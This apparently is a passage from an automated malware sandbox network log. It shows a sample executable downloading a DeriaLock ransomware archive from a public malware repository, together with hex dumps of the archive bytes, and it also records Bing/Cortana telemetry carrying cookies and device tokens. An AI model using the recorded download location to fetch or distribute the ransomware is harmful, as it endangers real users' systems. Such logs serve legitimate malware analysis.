                                                                                                                                                    2022-09-29 13:02:10 UTC39907INData Raw: 3f 97 e0 b2 12 61 ba ea fd 30 36 3e 33 2e 0d cb 94 43 4b 7f 6d e9 43 11 8f d1 94 a5 b5 3f 40 5a c7 29 35 20 35 d1 12 36 f9 57 23 5b 7a 0e 2e 88 72 ae 0f 41 2a 34 00 83 72 eb ab bd 5c f0 9b a1 f4 bd 88 57 cf 32 6b 94 96 b7 80 a7 19 49 6d e4 76 46 ec a4 f5 42 b3 9c 43 c8 02 6c 3c 25 b3 b8 07 ff fa 90 64 cb 1b 99 08 cc b2 00 92 b3 4d 0e 07 e8 98 ce ff 11 b2 c4 d1 d7 49 32 d5 af 8b 37 2b 02 0f 65 74 6e c2 a2 75 c9 8d 44 49 8f e8 8f c7 d2 19 32 e2 b8 0f b6 39 aa b4 22 69 74 48 26 18 94 39 48 8b 1f a8 3e 91 d3 de 7a db 67 c1 10 69 3a 03 77 42 7c 09 16 db c0 da 3d de b5 3b fd 81 eb 47 de 8f a3 d6 2d 78 4c f8 e3 ec c2 a0 cb 85 4e 5f 59 99 08 3c 2c f1 91 7a c1 87 db 83 a7 56 2d 37 32 21 a2 56 10 30 09 db 21 ed ae e3 1e da 65 8d 86 a0 87 f4 5b 94 f7 e6 fd b6 de d6
                                                                                                                                                    Data Ascii: ?a06>3.CKmC?@Z)5 56W#[z.rA*4r\W2kImvFBCl<%dMI27+etnuDI29"itH&9H>zgi:wB|=;G-xLN_Y<,zV-72!V0!e[
                                                                                                                                                    2022-09-29 13:02:10 UTC39923INData Raw: d8 98 c8 88 9a 66 69 3e 09 bd a4 64 cb b9 ca c5 57 db d2 d1 ea 2a 11 5f 40 32 44 6c 77 33 94 1e 74 46 c4 b2 98 3b c0 aa 5f 48 f2 8e 23 88 fb da be 6f 9a b8 f7 2e bc d1 34 c6 be 18 c3 90 95 17 02 08 0d 50 2a 20 90 82 12 03 aa 77 eb 32 bd 04 f1 91 92 d2 17 5c 85 52 4d 01 e1 ae a6 41 79 19 fe 43 5c 1b f6 d8 22 a5 26 b7 14 35 bf 4d 4c a5 22 bd 8b b3 89 9d 0e 45 31 8a 10 cf ea 62 43 af 9d 69 4c 01 6c bd 9e 53 b5 f7 15 c5 f8 d2 eb 58 dd e1 77 b0 d8 1f ea 54 38 36 8d 37 8f 56 61 b9 85 86 2b f1 9d 15 f1 fb 19 b2 45 da 9f e5 c9 7c a8 36 69 ce 4b 9a 2b 25 98 e5 f6 de 57 1b a7 07 e2 e0 08 42 6b 77 72 fd fa 49 b5 47 59 3e da 53 3e 99 b1 d3 39 0c 49 0e ba a8 f7 6e 56 1d f7 0c 28 f5 b3 59 06 99 57 15 19 0a 26 7f a1 d7 f7 26 63 e9 9a 62 9d fa 6f b8 a9 25 0b 2d 7d 05 62
                                                                                                                                                    Data Ascii: fi>dW*_@2Dlw3tF;_H#o.4P* w2\RMAyC\"&5ML"E1bCiLlSXwT867Va+E|6iK+%WBkwrIGY>S>9InV(YW&&cbo%-}b


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    18140.82.121.3443192.168.2.349716C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:53 UTC887INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:03 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:58:53 UTC888INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    19192.168.2.349717185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:53 UTC889OUTGET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    2192.168.2.349707204.79.197.200443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:38 UTC94OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                    Origin: https://www.bing.com
                                                                                                                                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                    Content-type: text/xml
                                                                                                                                                    X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                                                                                                                                    X-PositionerType: Desktop
                                                                                                                                                    X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                                                                                                                                    X-Search-SafeSearch: Moderate
                                                                                                                                                    X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                                                                                                                                    X-UserAgeClass: Unknown
                                                                                                                                                    X-BM-Market: US
                                                                                                                                                    X-BM-DateFormat: M/d/yyyy
                                                                                                                                                    X-CortanaAccessAboveLock: false
                                                                                                                                                    X-Device-OSSKU: 48
                                                                                                                                                    X-BM-DTZ: -420
                                                                                                                                                    X-BM-FirstEnabledTime: 132061295966656129
                                                                                                                                                    X-DeviceID: 0100748C09004E33
                                                                                                                                                    X-BM-DeviceScale: 100
                                                                                                                                                    X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                                                                                                                                    X-BM-Theme: 000000;0078d7
                                                                                                                                                    X-BM-DeviceDimensionsLogical: 1232x1024
                                                                                                                                                    X-BM-DeviceDimensions: 1232x1024
                                                                                                                                                    X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                                                                                                                                    X-Agent-DeviceId: 0100748C09004E33
                                                                                                                                                    X-BM-CBT: 1660685844
                                                                                                                                                    X-Device-isOptin: true
                                                                                                                                                    X-Device-Touch: false
                                                                                                                                                    X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                                                                                                                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                    X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                    Host: www.bing.com
                                                                                                                                                    Content-Length: 92374
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1664488707263&AC=1&CPH=4ef661f2; SRCHUID=V=2&GUID=CAFE605AAF964660B8479EEA5D4FD3FE&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220929; SRCHHPGUSR=SRCHLANG=en; ANON=A=E6EAEF30D7E9C145923C068AFFFFFFFF; MUIDB=1E17B9B70E9B4C6E957D159ED3646FFF
                                                                                                                                                    2022-09-29 12:58:38 UTC97OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65
                                                                                                                                                    Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>C0409E84C7EC4D16A2CDDA4805E2D3C4</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                                                                                                                                    2022-09-29 12:58:38 UTC113OUTData Raw: 3a 38 2c 22 50 4c 22 3a 31 2c 22 4b 22 3a 32 31 2c 22 52 52 54 22 3a 7b 22 43 47 22 3a 32 36 2c 22 4d 52 55 22 3a 32 37 2c 22 4d 50 50 22 3a 32 37 2c 22 4d 53 54 22 3a 32 37 2c 22 4d 46 46 22 3a 32 37 2c 22 49 46 46 22 3a 33 37 2c 22 50 50 22 3a 34 36 2c 22 57 65 62 22 3a 37 31 7d 2c 22 52 46 54 22 3a 7b 22 50 50 22 3a 37 31 2c 22 4d 50 50 22 3a 37 31 2c 22 4d 53 54 22 3a 37 31 2c 22 43 47 22 3a 37 31 7d 2c 22 54 52 52 22 3a 5b 7b 22 56 22 3a 36 39 2c 22 54 22 3a 22 50 50 22 7d 5d 2c 22 49 52 54 22 3a 7b 22 31 30 30 31 2e 31 54 22 3a 7b 22 42 22 3a 34 39 2c 22 45 22 3a 36 38 2c 22 54 22 3a 22 50 50 22 7d 2c 22 31 30 30 32 2e 31 53 22 3a 7b 22 42 22 3a 35 34 2c 22 45 22 3a 36 39 2c 22 54 22 3a 22 50 50 22 7d 7d 7d 5d 2c 22 53 54 41 54 45 22 3a 7b 22 57 65
                                                                                                                                                    Data Ascii: :8,"PL":1,"K":21,"RRT":{"CG":26,"MRU":27,"MPP":27,"MST":27,"MFF":27,"IFF":37,"PP":46,"Web":71},"RFT":{"PP":71,"MPP":71,"MST":71,"CG":71},"TRR":[{"V":69,"T":"PP"}],"IRT":{"1001.1T":{"B":49,"E":68,"T":"PP"},"1002.1S":{"B":54,"E":69,"T":"PP"}}}],"STATE":{"We
                                                                                                                                                    2022-09-29 12:58:38 UTC129OUTData Raw: 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 6a 6d 2f 75 2f 2f 40 30 2f 56 32 25 32 46 32 2c 53 57 56 43 2f 2f 30 2f 40 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 22 2c 22 54 53 22 3a 31 36 33 32 33 35 39 32 30 34 31 30 31 2c 22 52 54 53 22 3a 31 35 32 33 2c 22 53 45 51 22 3a 31 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 55 54 53 22 3a 31 36 36 34 34 38 38 37 31 37 32 39 31 7d 5d 5d 3e 3c 2f 44 3e 3c 54 53 3e 31 36 33 32 33 35 39 32 30 34 31 30 31 3c 2f 54 53 3e 3c 2f 45 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 49 51 75 65 75 65 45 72 72 6f 72 3c 2f 54 3e 3c 49 47
                                                                                                                                                    Data Ascii: /-1/-1/-1/-1+jm/u//@0/V2%2F2,SWVC//0/@1/-1/-1/-1/-1/-1/-1","TS":1632359204101,"RTS":1523,"SEQ":1,"CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","UTS":1664488717291}...</D><TS>1632359204101</TS></E><E><T>Event.CIQueueError</T><IG
                                                                                                                                                    2022-09-29 12:58:38 UTC145OUTData Raw: 50 22 2c 22 48 6f 22 3a 32 2c 22 47 72 22 3a 30 2c 22 44 65 76 69 63 65 53 69 67 6e 61 6c 73 22 3a 7b 22 52 61 6e 6b 22 3a 33 37 37 32 2c 22 50 48 69 74 73 22 3a 22 53 79 73 74 65 6d 2e 50 61 72 73 69 6e 67 4e 61 6d 65 22 2c 22 49 64 22 3a 22 7b 31 41 43 31 34 45 37 37 2d 30 32 45 37 2d 34 45 35 44 2d 42 37 34 34 2d 32 45 42 31 41 45 35 31 39 38 42 37 7d 5c 5c 73 65 72 76 69 63 65 73 2e 6d 73 63 22 2c 22 44 4e 61 6d 65 22 3a 22 53 65 72 76 69 63 65 73 22 2c 22 4c 41 44 22 3a 22 32 30 32 30 2d 30 37 2d 32 33 54 31 37 3a 31 38 3a 30 35 2e 32 32 39 5a 22 2c 22 41 70 70 4c 6e 63 68 22 3a 32 2c 22 41 72 67 73 22 3a 30 2c 22 4d 44 4e 22 3a 30 2c 22 45 78 74 22 3a 22 2e 6d 73 63 22 7d 2c 22 52 61 6e 6b 65 72 53 69 67 6e 61 6c 73 22 3a 7b 22 72 61 6e 6b 69 6e 67
                                                                                                                                                    Data Ascii: P","Ho":2,"Gr":0,"DeviceSignals":{"Rank":3772,"PHits":"System.ParsingName","Id":"{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\services.msc","DName":"Services","LAD":"2020-07-23T17:18:05.229Z","AppLnch":2,"Args":0,"MDN":0,"Ext":".msc"},"RankerSignals":{"ranking
                                                                                                                                                    2022-09-29 12:58:38 UTC161OUTData Raw: 2c 22 50 48 69 74 73 22 3a 22 53 79 73 74 65 6d 2e 50 61 72 73 69 6e 67 4e 61 6d 65 22 2c 22 49 64 22 3a 22 7b 31 41 43 31 34 45 37 37 2d 30 32 45 37 2d 34 45 35 44 2d 42 37 34 34 2d 32 45 42 31 41 45 35 31 39 38 42 37 7d 5c 5c 69 73 63 73 69 63 70 6c 2e 65 78 65 22 2c 22 44 4e 61 6d 65 22 3a 22 69 53 43 53 49 20 49 6e 69 74 69 61 74 6f 72 22 2c 22 41 70 70 4c 6e 63 68 22 3a 30 2c 22 41 72 67 73 22 3a 30 2c 22 4d 44 4e 22 3a 30 2c 22 45 78 74 22 3a 22 2e 65 78 65 22 7d 2c 22 52 61 6e 6b 65 72 53 69 67 6e 61 6c 73 22 3a 7b 22 72 61 6e 6b 69 6e 67 53 63 6f 72 65 22 3a 2d 30 2e 37 39 34 33 34 2c 22 66 65 61 74 75 72 65 53 74 6f 72 65 22 3a 7b 22 31 22 3a 31 2c 22 37 22 3a 39 38 30 34 2c 22 38 22 3a 31 2c 22 31 30 22 3a 31 2c 22 31 36 22 3a 39 38 30 34 2c 22
                                                                                                                                                    Data Ascii: ,"PHits":"System.ParsingName","Id":"{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\iscsicpl.exe","DName":"iSCSI Initiator","AppLnch":0,"Args":0,"MDN":0,"Ext":".exe"},"RankerSignals":{"rankingScore":-0.79434,"featureStore":{"1":1,"7":9804,"8":1,"10":1,"16":9804,"
                                                                                                                                                    2022-09-29 12:58:38 UTC177OUTData Raw: 72 65 22 3a 36 2e 37 31 36 37 36 2c 22 66 65 61 74 75 72 65 53 74 6f 72 65 22 3a 7b 22 31 22 3a 31 2c 22 37 22 3a 31 32 38 30 30 31 2c 22 38 22 3a 31 2c 22 31 30 22 3a 34 2c 22 31 36 22 3a 33 31 32 33 2c 22 31 39 22 3a 31 2c 22 34 32 22 3a 31 2c 22 38 33 22 3a 31 2c 22 31 33 34 22 3a 31 33 2c 22 31 33 35 22 3a 31 2e 36 32 35 2c 22 31 33 37 22 3a 31 37 2c 22 31 35 37 22 3a 31 2c 22 31 35 39 22 3a 33 31 32 32 2c 22 32 36 34 22 3a 31 2c 22 32 36 39 22 3a 33 31 32 32 2c 22 32 37 30 22 3a 33 31 32 32 2c 22 32 38 34 22 3a 31 33 2c 22 32 39 36 22 3a 31 7d 2c 22 66 62 63 53 63 6f 72 65 22 3a 30 2e 38 34 37 32 35 7d 7d 2c 7b 22 54 22 3a 22 44 2e 55 72 6c 22 2c 22 4b 22 3a 31 30 30 39 2c 22 51 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 2c 22 4d 51 22 3a
                                                                                                                                                    Data Ascii: re":6.71676,"featureStore":{"1":1,"7":128001,"8":1,"10":4,"16":3123,"19":1,"42":1,"83":1,"134":13,"135":1.625,"137":17,"157":1,"159":3122,"264":1,"269":3122,"270":3122,"284":13,"296":1},"fbcScore":0.84725}},{"T":"D.Url","K":1009,"Q":"Microsoft Edge","MQ":
                                                                                                                                                    2022-09-29 12:58:38 UTC187INHTTP/1.1 204 No Content
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Cache: CONFIG_NOCACHE
                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    X-MSEdge-Ref: Ref A: A10AB359230147E59542CA58B483F4EE Ref B: FRA31EDGE0614 Ref C: 2022-09-29T12:58:38Z
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:37 GMT
                                                                                                                                                    Connection: close


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    20185.199.108.133443192.168.2.349717C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:53 UTC890INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 215551
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "ee00430e92951d5ab964c364741ca65eb7489f27da783a2e2ec395efcca6982a"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0813:121E:2686D8:32DEE8:6335931B
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:53 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6963-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456333.163161,VS0,VE182
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 71250a222166e2f2d4d6f6ac7c516e13c18d0fb8
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:03:53 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:58:53 UTC890INData Raw: 50 4b 03 04 14 00 01 00 08 00 b9 44 9d 49 fb a7 08 f7 49 49 03 00 00 90 07 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 44 65 72 69 61 4c 6f 63 6b 2e 65 78 65 8f 5e c1 d2 4e 0d 5f 39 3e ec 9e 1a 00 e0 ba e5 f5 be 9e 96 4e e6 01 53 65 32 9c ef 35 79 aa 89 be e7 a1 c5 67 ef 92 69 5f 6a cd 1e 64 76 70 1a 6a aa 4b 9a fa 65 0d 36 ac dc 2d fa 18 41 f4 90 27 10 c4 f7 86 51 d7 e1 38 f9 19 23 6a 06 4f b5 90 c1 dd c3 23 3c 19 77 e3 44 06 84 ce 90 3c c2 c7 5f 60 30 36 92 57 7f 96 fa 21 09 c1 ef 1a 4b 1b dd 2c 93 f5 d6 b9 79 75 8a 42 65 ef 69 bf c5 84 8a 58 98 3b 72 e6 2b a7 c3 d9 22 01 60 13 a6 b8 0a 02 a3 ac 92 01 17 24 1f 36 a3 d5 4a 7e fc d3 56 64 b6 8b 10 96 4c 8b 86 ef 7b 8c dd af 2b b6 2c 1f b6 9f 38 6c 79 5c 08 53 02 ea be fc 69 9a ee fb 19 3c 74 bb 8d 5e
                                                                                                                                                    Data Ascii: PKDIIIEndermanch@DeriaLock.exe^N_9>NSe25ygi_jdvpjKe6-A'Q8#jO#<wD<_`06W!K,yuBeiX;r+"`$6J~VdL{+,8ly\Si<t^
                                                                                                                                                    2022-09-29 12:58:53 UTC892INData Raw: 94 c5 72 fa c2 61 fb 91 6f d4 4d 42 a4 e2 fd 95 ef a3 4a c6 21 f1 04 3c d2 65 f4 87 54 3b b1 d9 24 6b bb 53 35 98 8a 46 94 13 e5 e5 71 37 5e a0 a4 3f de 39 e4 f7 0f 6c ae 3b 7d e2 9f 02 68 e9 7a 0f 04 0f 84 99 12 17 84 40 6a 21 45 6e ab a8 1c ad 5b fd 63 f9 d6 b7 03 b3 08 85 3a ff 28 c3 ce f2 4e 28 9a 06 ba bd b1 c1 c6 1d 18 8c c8 75 9a 08 e7 6c 69 b8 f9 2c ac ff 76 1e 5e 31 2f 04 2d 59 0f 0a f1 3d ad fe da ff 60 35 1e 9f 9d fe a7 48 5e 42 0a b7 4a 71 86 b0 e6 0f 22 37 8f 61 c6 d8 4b 4e fd 68 7d 39 85 cc 2d 7f 8c 69 8b e4 87 12 20 eb ad ec ff 34 6a 74 ce a1 3f ea 35 4f b0 e6 0e 10 6e e4 e9 e4 09 a9 52 52 6e 8d d1 a3 dd 76 d9 20 a7 64 70 a8 c7 f8 a9 2e f1 15 0c b6 22 f1 61 65 01 fb 6e 71 61 84 fb 5d c9 b5 52 52 68 f3 91 fd 77 47 da 1b cc 5d 1a 62 0f 15 2e
                                                                                                                                                    Data Ascii: raoMBJ!<eT;$kS5Fq7^?9l;}hz@j!En[c:(N(uli,v^1/-Y=`5H^BJq"7aKNh}9-i 4jt?5OnRRnv dp."aenqa]RRhwG]b.
                                                                                                                                                    2022-09-29 12:58:53 UTC893INData Raw: cc 05 3d e1 b2 30 5b de b2 9b d9 d6 ea ab b5 85 1b 89 f4 ee de e4 8b 82 3a e3 6f 98 0e 69 a4 4a 2e 2a 96 04 cd 1b e0 65 13 c3 4a 40 9d 44 04 e8 a1 fb 80 50 b2 06 cc 12 bd 98 b4 82 db 35 c7 66 6b 16 d7 3f a8 61 a3 f5 3d 63 4d b6 f1 8f ef e0 0d 11 e8 2b 3e e4 4e a3 4a a5 d6 fe 96 93 dd 4c bc e2 8e 68 31 5b 64 91 7e f0 77 34 f8 29 a9 ab 7a 16 db 82 b8 5b a1 c1 7f 0a c5 b2 6c 46 82 28 54 17 10 1f dd 03 e2 4b 23 e9 5e 0d aa 2a 56 cd b9 dc 53 bf dd fc cf 38 80 26 02 b1 1b 19 b9 63 2d 94 8f e9 5a 65 0b 9a 0b 97 8d 9e 9d d0 9d 6e 52 5e 88 67 34 e3 cd ed a8 6a 1d 92 5c d2 ba 45 05 8e 75 6b 4d da 87 f9 0e f4 be fa 0f 3c 36 11 0e ab 28 64 11 7b 52 fb ce c0 43 99 2e 2a 72 6e 53 27 e6 59 7d 32 18 70 28 f6 1c c1 93 a0 10 cf 8c 1b 83 f0 f3 7d fe b9 c5 61 70 07 72 f1 4c
                                                                                                                                                    Data Ascii: =0[:oiJ.*eJ@DP5fk?a=cM+>NJLh1[d~w4)z[lF(TK#^*VS8&c-ZenR^g4j\EukM<6(d{RC.*rnS'Y}2p(}aprL
                                                                                                                                                    2022-09-29 12:58:53 UTC894INData Raw: 9b 61 d3 15 e1 24 fe 26 e5 91 eb af 6a 86 10 ed ae 06 0e 8f c4 a1 c0 45 4d 9d 33 c0 fd 40 f7 6d 09 4e cc ee 84 c9 07 3b 6d c4 21 7b 31 2a 1f 56 12 c6 e5 da ef e7 95 fd 9b d7 29 d7 fd 86 54 27 af ce 04 86 09 32 4a 79 6a 97 0a dd 2f 97 a1 08 e5 1e 72 35 5f 7d ec 5b 70 39 a1 01 2d a5 85 44 69 16 87 fd d4 2a 46 22 a0 93 ea 40 c5 22 f6 70 7d a8 05 a7 fa b2 23 0b 73 ce 0c 13 94 6d 09 29 37 be d8 50 30 c1 2f 01 b9 51 af 19 0a 7b 21 a1 54 df 6d 7b b9 c0 91 ee 4f bb 3b a8 7d f1 90 9a b6 e7 3e f4 d4 c1 e2 af 89 6c ef 9c 3d 2e 39 1a 79 d9 60 70 a8 21 26 6f 3f fc a7 13 c0 f3 77 5c e7 b4 ee c8 f5 a8 83 de 12 e7 3c cc 62 66 e2 86 53 6f df ec e9 b2 7d 3a f1 4f 95 7b a5 82 f0 47 04 43 b6 ef 99 e4 41 be 7d 82 25 0f c3 ab 00 8b 57 83 b0 9e 76 71 64 35 a7 63 1f d8 bc 8a 90
                                                                                                                                                    Data Ascii: a$&jEM3@mN;m!{1*V)T'2Jyj/r5_}[p9-Di*F"@"p}#sm)7P0/Q{!Tm{O;}>l=.9y`p!&o?w\<bfSo}:O{GCA}%Wvqd5c
